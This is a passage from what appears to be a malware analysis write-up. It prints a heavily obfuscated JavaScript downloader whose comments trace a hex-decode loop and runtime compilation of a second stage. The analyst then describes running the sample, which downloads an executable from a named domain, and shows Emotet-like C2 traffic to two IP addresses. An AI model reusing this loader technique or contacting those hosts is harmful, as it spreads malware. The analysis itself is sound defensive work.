            if ('rg'.slice(1, 2)) {}
        }

        function OBD() {
            return 'ri'.charAt(0);
        }

        function by() {
            return new Date();
        }

        function Mcb() {
            return Math.sqrt(477578672);
        }
        pa += 'n';
        if ('au'.search(/a/)) {}
        if ('oi'.charAt(0)) {
            if ('au'.search(/a/)) {}
        }
        pa += 'cti';

        function Aq() {
            return 'mip';
        }

        function LFS() {
            return 'eu'.concat('i');
        }
        var E5u = function() {};
        E5u();
        for (var eit = 2; eit < 4; ++eit) {
            function Aq() {
                return 'mip';
            }

            function LFS() {
                return 'eu'.concat('i');
            }
            var E5u = function() {};
            E5u();
        }
        pa += 'o';

        function LkI() {}
        LkI();
        for (var noe = 1; noe < 4; ++noe) {
            function LkI() {}
            LkI();
        }
        for (var buu = 4; buu < 4; ++buu) {
            function LkI() {}
            LkI();
            for (var noe = 1; noe < 4; ++noe) {
                function LkI() {}
                LkI();
            }
        }
        pa += 'n(srr';
        for (var uip = 2; uip < 5; ++uip) {}
        pa += ',ea';
        pa += 'i){re';
        var hMf = function() {
            return Math.round(209960561);
        };

        function LNc() {
            return 'x'.search(/x/);
        }
        var yu = function() {
            return 'iyy'.lastIndexOf('y');
        };
        for (var lxo = 2; lxo < 4; ++lxo) {}
        pa += 'turn ';
        var t8 = function() {
            return 'ho'.replace(/o/, 'h');
        };
        for (var aqt = 3; aqt < 5; ++aqt) {}
        for (var jp = 4; jp < 5; ++jp) {
            var t8 = function() {
                return 'ho'.replace(/o/, 'h');
            };
            for (var aqt = 3; aqt < 5; ++aqt) {}
        }
        var LG = function() {
            var t8 = function() {
                return 'ho'.replace(/o/, 'h');
            };
            for (var aqt = 3; aqt < 5; ++aqt) {}
            for (var jp = 4; jp < 5; ++jp) {
                var t8 = function() {
                    return 'ho'.replace(/o/, 'h');
                };
                for (var aqt = 3; aqt < 5; ++aqt) {}
            }
        };
        LG();
        pa += 'par';
        for (var ike = 5; ike < 5; ++ike) {}
        if ('gin'.slice(2, 2)) {
            for (var ike = 5; ike < 5; ++ike) {}
        }
        pa += 'seIn';
        if ('bke'.charAt(1)) {}
        for (var eoe = 3; eoe < 5; ++eoe) {
            if ('bke'.charAt(1)) {}
        }
        var YrL = function() {
            return 'sea'.concat('kcy');
        };

        function Ue() {
            return Math.round(491888163);
        }

        function ArL() {
            return 85;
        }
        if (new Date()) {
            if ('bke'.charAt(1)) {}
            for (var eoe = 3; eoe < 5; ++eoe) {
                if ('bke'.charAt(1)) {}
            }
            var YrL = function() {
                return 'sea'.concat('kcy');
            };

            function Ue() {
                return Math.round(491888163);
            }

            function ArL() {
                return 85;
            }
        }
        pa += 't(';
        pa += 'srr,e';
        if ('u'.lastIndexOf('u')) {}
        pa += 'ai';
        var EG = function() {
            return 110;
        };
        for (var kk = 2; kk < 5; ++kk) {}
        pa += ')';
        pa += '};'; // end of the first helper (iak = parseInt)
        for (var iez = 4; iez < 4; ++iez) {}

        function iM() {
            return 'uo'.toLowerCase();
        }
        var KHu = function() {
            return 'k'.search(/k/);
        };
        var wfF = function() {
            return 'sua'.charAt(2);
        };
        for (var zp = 3; zp < 4; ++zp) {
            for (var iez = 4; iez < 4; ++iez) {}

            function iM() {
                return 'uo'.toLowerCase();
            }
            var KHu = function() {
                return 'k'.search(/k/);
            };
            var wfF = function() {
                return 'sua'.charAt(2);
            };
        }
        var PtS = function() {
            return 'lo';
        };

        function NR() {
            return 'uii'.replace(/i/, 'i');
        }
        var jK6 = function() {
            return 'suh'.slice(3, 3);
        };
        for (var cif = 4; cif < 5; ++cif) {
            for (var iez = 4; iez < 4; ++iez) {}

            function iM() {
                return 'uo'.toLowerCase();
            }
            var KHu = function() {
                return 'k'.search(/k/);
            };
            var wfF = function() {
                return 'sua'.charAt(2);
            };
            for (var zp = 3; zp < 4; ++zp) {
                for (var iez = 4; iez < 4; ++iez) {}

                function iM() {
                    return 'uo'.toLowerCase();
                }
                var KHu = function() {
                    return 'k'.search(/k/);
                };
                var wfF = function() {
                    return 'sua'.charAt(2);
                };
            }
        }
        pa += 'ee'; // start of the second helper (eee = String.fromCharCode)
        pa += 'e=';
        var VBg = function() {};
        VBg();
        pa += 'fun';
        if ('p'.slice(1, 1)) {}
        if (Math.round(434461680)) {
            if ('p'.slice(1, 1)) {}
        }
        var GAz = function() {
            return 'di'.slice(1, 2);
        };
        var THZ = function() {
            return 'wz'.concat('llz');
        };
        for (var uso = 1; uso < 3; ++uso) {
            if ('p'.slice(1, 1)) {}
            if (Math.round(434461680)) {
                if ('p'.slice(1, 1)) {}
            }
            var GAz = function() {
                return 'di'.slice(1, 2);
            };
            var THZ = function() {
                return 'wz'.concat('llz');
            };
        }
        pa += 'ct';
        var TY = function() {};
        TY();
        for (var fwt = 1; fwt < 3; ++fwt) {
            var TY = function() {};
            TY();
        }

        function uj() {
            return 'mh'.slice(2, 2);
        }
        pa += 'ion';
        if ('fc'.replace(/f/, 'f')) {}
        var cXk = function() {
            return 'kib'.toLowerCase();
        };
        pa += '(';
        if ('jjn'.toLowerCase()) {}
        var zJ = function() {
            return 303;
        };
        var iUt = function() {
            return 'egi'.search(/g/);
        };

        function cqt() {
            return Math.round(59035367);
        }
        for (var yiz = 5; yiz < 5; ++yiz) {
            if ('jjn'.toLowerCase()) {}
            var zJ = function() {
                return 303;
            };
        }
        pa += 'sr';
        pa += 'r){re';
        for (var piu = 5; piu < 5; ++piu) {}

        function hR() {
            return 'aa'.search(/a/);
        }

        function Ar() {
            return 'wwf'.charAt(1);
        }
        var cA = function() {
            return Math.round(756558367);
        };
        for (var mb = 1; mb < 3; ++mb) {
            for (var piu = 5; piu < 5; ++piu) {}
        }
        pa += 'tur';
        for (var qun = 5; qun < 5; ++qun) {}

        function vB() {
            return Math.round(127701752);
        }

        function Lw() {
            return 'sp'.slice(2, 2);
        }

        function rB() {
            return 'hzo'.slice(2, 3);
        }
        if ('t'.search(/t/)) {
            for (var qun = 5; qun < 5; ++qun) {}

            function vB() {
                return Math.round(127701752);
            }

            function Lw() {
                return 'sp'.slice(2, 2);
            }

            function rB() {
                return 'hzo'.slice(2, 3);
            }
        }
        pa += 'n S';
        var TA = function() {
            return Math.sqrt(958771958);
        };
        var zQ = function() {
            return 'm'.concat('eo');
        };
        var KU = function() {
            return 'fp'.lastIndexOf('p');
        };
        for (var epe = 1; epe < 1; ++epe) {}
        var tm = function() {
            var TA = function() {
                return Math.sqrt(958771958);
            };
            var zQ = function() {
                return 'm'.concat('eo');
            };
            var KU = function() {
                return 'fp'.lastIndexOf('p');
            };
            for (var epe = 1; epe < 1; ++epe) {}
        };
        tm();

        function Amy() {
            var TA = function() {
                return Math.sqrt(958771958);
            };
            var zQ = function() {
                return 'm'.concat('eo');
            };
            var KU = function() {
                return 'fp'.lastIndexOf('p');
            };
            for (var epe = 1; epe < 1; ++epe) {}
            var tm = function() {
                var TA = function() {
                    return Math.sqrt(958771958);
                };
                var zQ = function() {
                    return 'm'.concat('eo');
                };
                var KU = function() {
                    return 'fp'.lastIndexOf('p');
                };
                for (var epe = 1; epe < 1; ++epe) {}
            };
            tm();
        }
        Amy();
        pa += 'tr';
        for (var daz = 1; daz < 4; ++daz) {}
        for (var uaj = 2; uaj < 5; ++uaj) {
            for (var daz = 1; daz < 4; ++daz) {}
        }
        pa += 'in';
        if (Math.sqrt(168041500)) {}
        if ('vva'.search(/v/)) {
            if (Math.sqrt(168041500)) {}
        }
        pa += 'g.fr';
        for (var qua = 2; qua < 3; ++qua) {}
        if (Math.round(33895371)) {
            for (var qua = 2; qua < 3; ++qua) {}
        }

        function S4U() {
            for (var qua = 2; qua < 3; ++qua) {}
            if (Math.round(33895371)) {
                for (var qua = 2; qua < 3; ++qua) {}
            }
        }
        S4U();

        function rU() {
            return Math.sqrt(796323856);
        }
        pa += 'omC';
        pa += 'harC';
        if (266) {}
        for (var zxi = 1; zxi < 2; ++zxi) {
            if (266) {}
        }

        function sAk() {
            return 'kq'.concat('bt');
        }
        pa += 'ode(s';
        if ('a'.concat('cz')) {}
        var axY = function() {
            if ('a'.concat('cz')) {}
        };
        axY();
        var AzT = function() {
            return new Date();
        };

        function wO() {
            return 667;
        }

        function dUi() {
            return new Date();
        }
        pa += 'r';
        var A5p = function() {
            return Math.round(84160849);
        };
        for (var cji = 2; cji < 5; ++cji) {}
        var JAo = function() {
            var A5p = function() {
                return Math.round(84160849);
            };
            for (var cji = 2; cji < 5; ++cji) {}
        };
        JAo();
        pa += 'r)};';
        fon = vqo(pa); // live: hand the assembled helper source to vqo; `fon` and `vqo` live outside this excerpt
    }
    var pdm = function() {
        iaz();
    };
    var jv = function() {
        pdm();
        var zUP = function() {
            return 'kq'.slice(2, 2);
        };

        function cH() {
            return 'zux'.lastIndexOf('x');
        }
        if ('een'.slice(1, 2)) {}
        if ('ib') {
            var zUP = function() {
                return 'kq'.slice(2, 2);
            };

            function cH() {
                return 'zux'.lastIndexOf('x');
            }
            if ('een'.slice(1, 2)) {}
        }
        var GvX = function() {
            return 'ai'.slice(2, 2);
        };

        function Dy() {
            return 'a'.slice(1, 1);
        }

        function np() {
            return Math.round(112971313);
        }
        for (var iky = 2; iky < 2; ++iky) {
            var zUP = function() {
                return 'kq'.slice(2, 2);
            };

            function cH() {
                return 'zux'.lastIndexOf('x');
            }
            if ('een'.slice(1, 2)) {}
            if ('ib') {
                var zUP = function() {
                    return 'kq'.slice(2, 2);
                };

                function cH() {
                    return 'zux'.lastIndexOf('x');
                }
                if ('een'.slice(1, 2)) {}
            }
            var GvX = function() {
                return 'ai'.slice(2, 2);
            };

            function Dy() {
                return 'a'.slice(1, 1);
            }

            function np() {
                return Math.round(112971313);
            }
        }
    };
    var ypj = function() {};
    ypj();
    var LR = function() {
        return new Date();
    };
    var oCX = function() {
        return 'rpr';
    };
    jv();

    // Wraps the Function constructor: returns a new function whose parameter
    // list is the string `aie` and whose body is the string `ugh`, i.e. it
    // compiles source text supplied at run time. Every statement after the
    // `return` is unreachable padding. Nothing in the visible excerpt calls
    // oej — the compile step the rest of the code uses is `vqo`, which is
    // defined elsewhere; whether vqo is an equivalent wrapper has to be
    // confirmed against its definition.
    function oej(aie, ugh) {
        for (var axi = 3; axi < 5; ++axi) {}
        return Function(aie, ugh); // runtime compilation of caller-supplied source
        var Bm9 = function() {};
        Bm9();
        var nj = function() {
            return 201;
        };
        if ('wo'.lastIndexOf('w')) {
            var Bm9 = function() {};
            Bm9();
        }
        for (var jlx = 2; jlx < 4; ++jlx) {
            var Bm9 = function() {};
            Bm9();
            var nj = function() {
                return 201;
            };
            if ('wo'.lastIndexOf('w')) {
                var Bm9 = function() {};
                Bm9();
            }
        }
    }
    for (var ier = 5; ier < 5; ++ier) {}

    function zV() {
        for (var ier = 5; ier < 5; ++ier) {}
    }
    zV();
    if ('ne'.slice(2, 2)) {
        for (var ier = 5; ier < 5; ++ier) {}

        function zV() {
            for (var ier = 5; ier < 5; ++ier) {}
        }
        zV();
    }
    agx = "";
    var Pr = function() {};
    Pr();

    // The only live statement here is `kn = vi.length;`: it records, in the
    // outer-scope variable `kn`, the length of `vi`, which is the data the
    // decode loop further down walks two characters at a time. `vi` itself
    // is defined outside this excerpt. The loops, constant `if` tests and
    // tM/FZi function expressions around it have no observable effect.
    function uob() {
        for (var oey = 1; oey < 2; ++oey) {}
        for (var ko = 2; ko < 2; ++ko) {
            for (var oey = 1; oey < 2; ++oey) {}
        }

        function JNf() {
            return 'if'.toLowerCase();
        }

        function FY2() {
            for (var oey = 1; oey < 2; ++oey) {}
            for (var ko = 2; ko < 2; ++ko) {
                for (var oey = 1; oey < 2; ++oey) {}
            }
        }
        FY2();
        kn = vi.length; // live: loop bound for the decode loop below
        var tM = function() {
            return 'txq'.concat('u');
        };
        var FZi = function() {
            return Math.sqrt(222735929);
        };
        if ('n'.slice(1, 1)) {}
        if ('ev'.charAt(1)) {
            var tM = function() {
                return 'txq'.concat('u');
            };
            var FZi = function() {
                return Math.sqrt(222735929);
            };
            if ('n'.slice(1, 1)) {}
        }
        if ('a'.replace(/a/, 'a')) {
            var tM = function() {
                return 'txq'.concat('u');
            };
            var FZi = function() {
                return Math.sqrt(222735929);
            };
            if ('n'.slice(1, 1)) {}
            if ('ev'.charAt(1)) {
                var tM = function() {
                    return 'txq'.concat('u');
                };
                var FZi = function() {
                    return Math.sqrt(222735929);
                };
                if ('n'.slice(1, 1)) {}
            }
        }
    }
    var iae = function() {
        uob();
    };
    var nw = {
        "vux": "ix",
        "uij": "ah",
        "kv": iae,
        "waa": "ela",
        "uw": "wxu"
    };
    if ('tue'.search(/u/)) {}

    function Yur() {
        return 'oou'.charAt(2);
    }
    var oE = function() {
        return 'su'.toLowerCase();
    };
    var AHq = function() {
        return 'o';
    };
    if ('evm'.charAt(0)) {
        if ('tue'.search(/u/)) {}

        function Yur() {
            return 'oou'.charAt(2);
        }
        var oE = function() {
            return 'su'.toLowerCase();
        };
        var AHq = function() {
            return 'o';
        };
    }

    function sM() {
        if ('tue'.search(/u/)) {}

        function Yur() {
            return 'oou'.charAt(2);
        }
        var oE = function() {
            return 'su'.toLowerCase();
        };
        var AHq = function() {
            return 'o';
        };
        if ('evm'.charAt(0)) {
            if ('tue'.search(/u/)) {}

            function Yur() {
                return 'oou'.charAt(2);
            }
            var oE = function() {
                return 'su'.toLowerCase();
            };
            var AHq = function() {
                return 'o';
            };
        }
    }
    sM();

    // Indirect entry to uob(): `nw.kv` is the function expression `iae`, which
    // calls uob(), so dop() ends up setting `kn = vi.length`. VB is an empty
    // no-op. dop() is invoked once, further down in this scope.
    function dop() {
        var VB = function() {};
        VB();
        nw.kv(); // -> iae() -> uob()
    }
    if (new Date()) {}
    if ('uxa'.slice(3, 3)) {
        if (new Date()) {}
    }

    function u2() {
        if (new Date()) {}
        if ('uxa'.slice(3, 3)) {
            if (new Date()) {}
        }
    }
    u2();

    function Z3p() {
        return Math.round(775736155);
    }
    var G8 = function() {
        return 523;
    };
    dop();
    var IM = function() {};
    IM();
    var Vy = function() {
        return 'be'.search(/b/);
    };

    function l7N() {
        return new Date();
    }

    function uW() {
        return 'm'.lastIndexOf('m');
    }
    for (var heq = 4; heq < 5; ++heq) {
        var IM = function() {};
        IM();
        var Vy = function() {
            return 'be'.search(/b/);
        };

        function l7N() {
            return new Date();
        }

        function uW() {
            return 'm'.lastIndexOf('m');
        }
    }
    if (623) {
        var IM = function() {};
        IM();
        var Vy = function() {
            return 'be'.search(/b/);
        };

        function l7N() {
            return new Date();
        }

        function uW() {
            return 'm'.lastIndexOf('m');
        }
        for (var heq = 4; heq < 5; ++heq) {
            var IM = function() {};
            IM();
            var Vy = function() {
                return 'be'.search(/b/);
            };

            function l7N() {
                return new Date();
            }

            function uW() {
                return 'm'.lastIndexOf('m');
            }
        }
    }
    // Live decode loop. `agx` was reset to "" earlier in this scope and `kn`
    // is `vi.length` (set by uob()). Per iteration the call chain is indirect
    // but linear:
    //   icu() -> dak():               xwq = ow(vi, ogi, 2)
    //   vk()  -> lom() -> ho() -> ewi(): una = iak(xwq, 16)
    //   mjz[1]() -> ist() -> daa():   agx += eee(una)
    // `ow` is defined outside this excerpt; given the step of 2 it presumably
    // returns the two characters of `vi` at offset ogi — confirm against its
    // definition. If `iak` and `eee` are the parseInt / String.fromCharCode
    // helpers whose source iaz() builds, each pair of hex digits in `vi`
    // becomes one character appended to `agx`. `xwq`, `una` and `agx` are
    // assigned without `var`, so they live in an outer scope. Everything
    // else in the loop body is padding with no observable effect.
    for (var ogi = 0; ogi < kn; ogi += 2) {
        if ('i'.concat('a')) {}

        function dak() {
            xwq = ow(vi, ogi, 2); // live: take the next two characters of `vi`
            if ('iua'.toLowerCase()) {}

            function FBg() {
                return 'q'.concat('ire');
            }
            var QDT = function() {
                return 'uuu'.search(/u/);
            };
            var s88 = function() {
                return 'ovq'.search(/q/);
            };
            var LP5 = function() {
                return 'e'.concat('euw');
            };
            if ('e'.slice(1, 1)) {
                if ('iua'.toLowerCase()) {}

                function FBg() {
                    return 'q'.concat('ire');
                }
            }
            var AX = function() {
                if ('iua'.toLowerCase()) {}

                function FBg() {
                    return 'q'.concat('ire');
                }
                var QDT = function() {
                    return 'uuu'.search(/u/);
                };
                var s88 = function() {
                    return 'ovq'.search(/q/);
                };
                var LP5 = function() {
                    return 'e'.concat('euw');
                };
                if ('e'.slice(1, 1)) {
                    if ('iua'.toLowerCase()) {}

                    function FBg() {
                        return 'q'.concat('ire');
                    }
                }
            };
            AX();
        }
        var cro = dak; // alias chain: dak -> cro -> icu
        var ZCj = function() {
            return 'cn'.lastIndexOf('n');
        };
        var kq = function() {
            return 'u'.search(/u/);
        };
        var Mfp = function() {
            return 'l'.concat('ehz');
        };
        for (var px = 4; px < 4; ++px) {}
        var icu = cro;
        for (var ueu = 4; ueu < 4; ++ueu) {}

        function AEe() {
            for (var ueu = 4; ueu < 4; ++ueu) {}
        }
        AEe();
        icu(); // live: runs dak()
        if (Math.round(52473223)) {}

        function cyp() {
            return 'za'.toLowerCase();
        }

        function ewi() {
            for (var fxp = 1; fxp < 3; ++fxp) {}
            una = iak(xwq, 16); // live: parse the pair with radix 16

            function RV() {}
            RV();
            if (new Date()) {
                function RV() {}
                RV();
            }
        }
        for (var vg = 1; vg < 4; ++vg) {}

        function IT() {
            return new Date();
        }

        function AFc() {
            for (var vg = 1; vg < 4; ++vg) {}

            function IT() {
                return new Date();
            }
        }
        AFc();

        function ho() {
            var kd = function() {};
            kd();
            var V4 = function() {
                return 'ua'.search(/u/);
            };
            var AZg = function() {
                return 'u'.replace(/u/, 'u');
            };
            var Au = function() {
                return 'e'.search(/e/);
            };
            ewi(); // live
            for (var udi = 2; udi < 4; ++udi) {}
        }
        var J1 = function() {};
        J1();

        function lom() {
            ho();
        }
        for (var kr = 3; kr < 3; ++kr) {}
        var fSl = function() {
            for (var kr = 3; kr < 3; ++kr) {}
        };
        fSl();
        var vk = lom; // alias: lom -> vk
        var EB = function() {};
        EB();
        var Ueo = function() {
            return 'zsc'.search(/z/);
        };

        function nxW() {
            return new Date();
        }

        function Yl() {
            return 'c'.slice(1, 1);
        }
        for (var aq = 3; aq < 4; ++aq) {
            var EB = function() {};
            EB();
        }

        function jbd() {
            return 'e'.charAt(0);
        }
        var A8 = function() {
            return 'i'.charAt(0);
        };
        for (var jn = 1; jn < 2; ++jn) {
            var EB = function() {};
            EB();
            var Ueo = function() {
                return 'zsc'.search(/z/);
            };

            function nxW() {
                return new Date();
            }

            function Yl() {
                return 'c'.slice(1, 1);
            }
            for (var aq = 3; aq < 4; ++aq) {
                var EB = function() {};
                EB();
            }
        }
        vk(); // live: runs lom() -> ho() -> ewi()
        if ('oia'.lastIndexOf('a')) {}

        function s6() {
            return 'r';
        }
        var pto = function() {
            return 'm';
        };
        var LX4 = function() {
            return 'ia'.search(/i/);
        };
        var VD = function() {
            if ('oia'.lastIndexOf('a')) {}

            function s6() {
                return 'r';
            }
            var pto = function() {
                return 'm';
            };
            var LX4 = function() {
                return 'ia'.search(/i/);
            };
        };
        VD();

        function dqv() {
            return 'f';
        }
        var OyX = function() {
            if ('oia'.lastIndexOf('a')) {}

            function s6() {
                return 'r';
            }
            var pto = function() {
                return 'm';
            };
            var LX4 = function() {
                return 'ia'.search(/i/);
            };
            var VD = function() {
                if ('oia'.lastIndexOf('a')) {}

                function s6() {
                    return 'r';
                }
                var pto = function() {
                    return 'm';
                };
                var LX4 = function() {
                    return 'ia'.search(/i/);
                };
            };
            VD();
        };
        OyX();
        for (var zjn = 3; zjn < 4; ++zjn) {}
        var Py = function() {
            return 'ho'.lastIndexOf('h');
        };

        function VE() {
            return 'a'.slice(1, 1);
        }
        var dAz = function() {
            return 'bu'.lastIndexOf('b');
        };
        for (var vw = 3; vw < 4; ++vw) {
            for (var zjn = 3; zjn < 4; ++zjn) {}
            var Py = function() {
                return 'ho'.lastIndexOf('h');
            };

            function VE() {
                return 'a'.slice(1, 1);
            }
            var dAz = function() {
                return 'bu'.lastIndexOf('b');
            };
        }

        function L9C() {
            return 'zak'.slice(3, 3);
        }
        var An = function() {
            return 'ei'.lastIndexOf('i');
        };

        function daa() {
            if ('a'.search(/a/)) {}

            function rvL() {
                return 'l'.toLowerCase();
            }
            var oqK = function() {
                return 'bof'.search(/b/);
            };

            function EP() {
                return Math.round(124143989);
            }

            function Fto() {
                if ('a'.search(/a/)) {}
            }
            Fto();
            agx += eee(una); // live: append the decoded character
            for (var ifr = 2; ifr < 5; ++ifr) {}
            if (new Date()) {
                for (var ifr = 2; ifr < 5; ++ifr) {}
            }

            function XZq() {
                return 'ei'.slice(1, 1);
            }

            function lS4() {
                return 'o'.search(/o/);
            }
            var nZ = function() {
                return 'udu'.slice(1, 3);
            };
            for (var bw = 2; bw < 3; ++bw) {
                for (var ifr = 2; ifr < 5; ++ifr) {}
                if (new Date()) {
                    for (var ifr = 2; ifr < 5; ++ifr) {}
                }
            }
        }

        function Vlu() {}
        Vlu();
        var kE = function() {
            function Vlu() {}
            Vlu();
        };
        kE();
        if (357) {
            function Vlu() {}
            Vlu();
            var kE = function() {
                function Vlu() {}
                Vlu();
            };
            kE();
        }

        function ist() {
            function Sg() {}
            Sg();
            daa(); // live
            if ('o'.replace(/o/, 'o')) {}
        }
        for (var sat = 3; sat < 3; ++sat) {}
        var AW7 = function() {
            return 'ys'.slice(1, 1);
        };
        var l7 = function() {
            return 'o'.toLowerCase();
        };
        var TdW = function() {
            return 'i'.lastIndexOf('i');
        };
        if ('p'.slice(1, 1)) {
            for (var sat = 3; sat < 3; ++sat) {}
        }

        function Wd() {
            return 'rw'.search(/r/);
        }
        var XIn = function() {
            return new Date();
        };

        function DmT() {
            return Math.round(267370883);
        }
        if ('ya'.concat('ex')) {
            for (var sat = 3; sat < 3; ++sat) {}
            var AW7 = function() {
                return 'ys'.slice(1, 1);
            };
            var l7 = function() {
                return 'o'.toLowerCase();
            };
            var TdW = function() {
                return 'i'.lastIndexOf('i');
            };
            if ('p'.slice(1, 1)) {
                for (var sat = 3; sat < 3; ++sat) {}
            }
        }
        var mjz = ["p", ist, "p"]; // ist is hidden in an array literal
        mjz[1](); // live: runs ist() -> daa()
        for (var uc = 5; uc < 5; ++uc) {}
    }
    var U6d = function() {
        return 'z'.lastIndexOf('z');
    };
    var YKG = function() {
        return 'nd'.slice(2, 2);
    };

    function qr() {}
    qr();
    for (var ieg = 1; ieg < 4; ++ieg) {
        var U6d = function() {
            return 'z'.lastIndexOf('z');
        };
        var YKG = function() {
            return 'nd'.slice(2, 2);
        };

        function qr() {}
        qr();
    }
    // Live: the fully decoded string `agx` is passed to the same helper that
    // was given the `pa` source in iaz(). `vqo` is defined outside this
    // excerpt, so whether it compiles, runs, or both has to be confirmed
    // there; this is the point where the decoded second stage leaves the
    // loader.
    vqo(agx);
    for (var uui = 3; uui < 3; ++uui) {}

    function PM() {
        for (var uui = 3; uui < 3; ++uui) {}
    }
    PM();

    function R5() {
        return 'qt'.toLowerCase();
    }
}
// Trailing top-level padding: dY5 is an empty function expression, the
// `for` loops start at 4 with a `< 4` condition and never run, and UVJ
// only repeats the same no-ops. Nothing here has an observable effect.
var dY5 = function() {};
dY5();
for (var kj = 4; kj < 4; ++kj) {
    var dY5 = function() {};
    dY5();
}
var UVJ = function() {
    var dY5 = function() {};
    dY5();
    for (var kj = 4; kj < 4; ++kj) {
        var dY5 = function() {};
        dY5();
    }
};
UVJ();

Since I was not able to deobfuscate this Javascript, I ran the Word document/javascript file instead. From a host perspective, the infection of the system is pretty straightforward. One process calls another and then another and so on and so forth.

The start seems to be from the javascript file reaching out to the domain “internetcheapskate.com” and downloading a malicious binary file.

GET /ezeofbhwy/ HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
Host: internetcheapskate.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Mon, 03 Jul 2017 13:54:54 GMT
Server: Apache
X-Powered-By: PHP/5.4.45
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Content-Disposition: attachment; filename="on.exe"
Content-Transfer-Encoding: binary
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

38600
MZ......................@.............................................	.!..L.!This program cannot be run in DOS mode.

I believe the file that is downloaded and executed is the “da241556.aoo” file, since the `file` output below identifies it as a PE32 executable.

file da241556.aoo 
da241556.aoo: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

The first check-ins with the C2 are made via one of the two “GeneralizeMspthrd.exe” processes (PIDs 1768 and 1788). Looking at the PCAP there is a call out to the IP address 173.243.126.142 over port 443 (this is not encrypted) for a fake “404 Not Found” page, which seems to fit the Emotet modus operandi along with the large Content-Length value and the unusual cookie.

GET / HTTP/1.1
Cookie: AB39=JXKXAPO6tSQ7XxUbXaee1b5oQj55euE0KpzNZ+0yxq1VdJJtXS3/Bl4oSrxDYPtk/ElBXwcGH/zO38w7pFZrZMnf9mZwiNQla/ZxTQwB4exI7D8ql+KCvvV0GAYOVysYjbGpHUu/ItUYgwPGPNB7NQYrqy/43MiK/CDgGGKkUbWnoPQ3peOPeLxjdjGvJwFbwlnHdsu22qdvI60GOezZhodNHfAOjroqXwNSgeVX8ioH+UtjGDDEzzjFQ3JvhbZVR84KR1mcghMO7gofvJ5dcw59aibUGNwnx8EBlQFVzmm0EJlcj2ztS++PNx6LBIJkJBJ+ttYN2j0Djee1sYWsxwWArWz18YDp+UZGARVZSg6CeAeWCcNQL7Mjo2S4yIOgufFkQlHwOH/UEnuRRfslm+J0nMD5e+/9YwMPK7Cak4SEfRmSkgiX9T0ybPVMHZ2EhuA5lpTMs+lCWNz2YDCClpmyLhU3umllfO5/fu/OdQc21tGrojJH3xZ7Y0edLOltp/jaJId+RCJPbBi7q5x1/ifreDObORWllt6s3opdshFp83J5TzJ2hdb7YGwSOC9NddcdgtBLGAoOH1XwGtHnlu3pkS4fhxkMzfmbyTj9dYQAwMu3r4Mr7hIrZXL3J3YOJ8pT47wAE5aXjKpJg3FsAbq9hYqfpZM7rQjbt7l7EQ9goufzMZNFQhAexvnLWTEPy1gDJzl6V+dDK3l+QM3bTqktRLxJ2UvmMQYps91j1GJatXdAwslJPgk5lD+dudvxxiyG/BcBfAnk6yRdpbTA9RjjsZMHwr3Vlr6xZovLtsECkuih7gqJH+aNsueGfhBr7llpD702DhNifTS7wSC4XT2XshY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)
Host: 173.243.126.142:443
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 03 Jul 2017 13:56:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 222868
Connection: keep-alive

.m...6.4.+....?6uc`C_...F.q..h.e%..... .....wK....LV\.....'sn\R...aG.LRt...4K..XE.@...<I(..1n<yq.h..a.....,...).$..|.|..I@{#.0.&........GJ..9.\..ew.T.V~.................`.2.I....(*b...u./.Y^%.E.....e>.:....>1S\.e.....U.ozx....)..yW....B~.R.TM...@x.....W...n........C.....W.P.3..,*.35..
.....1.W.......;..X	.I..|..7D....}......R.......c..@5.=R^..!
n.h.......!G....%...	.9......S..w.M..f9.
.~..,.U...*W.:....I..6......v.

There is also another check-in to the IP address 50.21.183.63 over port 443 (once again, not encrypted) with the same kind of traffic as above, differing only in the Content-Length.

GET / HTTP/1.1
Cookie: 1ABD=AaRUazimNMdgTtn4cdm8cC3acWdSm0SNZwtoFh8knGBsSkVdGyMkl2HArF0VfKV0epUv3SmRQrSEnh3T45GgDQjHI0yOoRIhwx4Zs6TdAyDjPwoPoOfRvdVHV+9PWu50eZ+jb7QCTGFsa4gyd/a8x64Xz1t7PUrPWq7/ypRBp1TlihSet6CmewtS3faqgTeCJnC3xPUxjHJ9BPsmXz4GMMfRbtLsLbWVJt9FeiVrSTFeU3nvcUkaD042uWT7ez44kTZ3Gl2FzTvOJ+7rlzSnVfVKyNwukOuaJJdWCTcfTHZAEceBCIYXpYpp9Jh3AZsvCJChY0CMrc29kI11P5biB4JJr4gxLJf4aurZmn3IfhxbLqO27BZgWEalqPLF0yF7VokpruRViB5FvIbtVxmtLR/qg8+oM1IPBpITuGRtzhfk6XvxTzExtO3jPAaexEd5tf2gKaQQ63j7fDZ4dailIUI1iyx2vWhxWoOAKs6zIG/tfI1SF5zJzvTYXzgdT8TxSj22lmAYrkYQ7Tp1xhV2HS2T5UN6NhUlQpc7Dggv4CdooskAugBuKKOpP2r2lwG+J1Ikjzyohklm/7/CjXp4Ya/drJLwXZh5a53vu4PeHbgimXUufQSeuI9DwmN39wrGUZWLL/WFj6iPhnFvsAf3mgH1ZC1iekbMn7n8MING4z6hFT2WXP72xvd1ASajTF1fC/UwvYGXHfr0kV2Ch+VtWDilBIeqmDga//lbreGPqpEhfYIupnvsu/iVjD+IqcD8WVuR+S/AdOwaZJJGhvo26WCd+a8QxVWWKf5cU8sRmupfJIHSXzrmPwq9XbwMDiSTFo0rxJUPHx58hX8c9QXaxfWUVxCpZOdRjAxmsfihA78+Kiz0
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)
Host: 50.21.183.63:443
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 03 Jul 2017 13:56:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 728740
Connection: keep-alive

9..*..I..B.........
